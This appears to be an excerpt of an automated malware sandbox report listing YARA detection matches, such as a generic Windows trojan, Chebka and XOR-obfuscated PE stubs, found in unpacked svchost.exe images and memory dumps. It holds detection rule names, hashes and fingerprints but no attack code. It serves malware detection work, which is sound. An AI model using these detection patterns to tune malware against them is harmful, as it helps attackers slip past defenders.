        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.317215501.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.798463056.00000244FC2B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
        Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.309035814.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.807536432.00000244FE300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
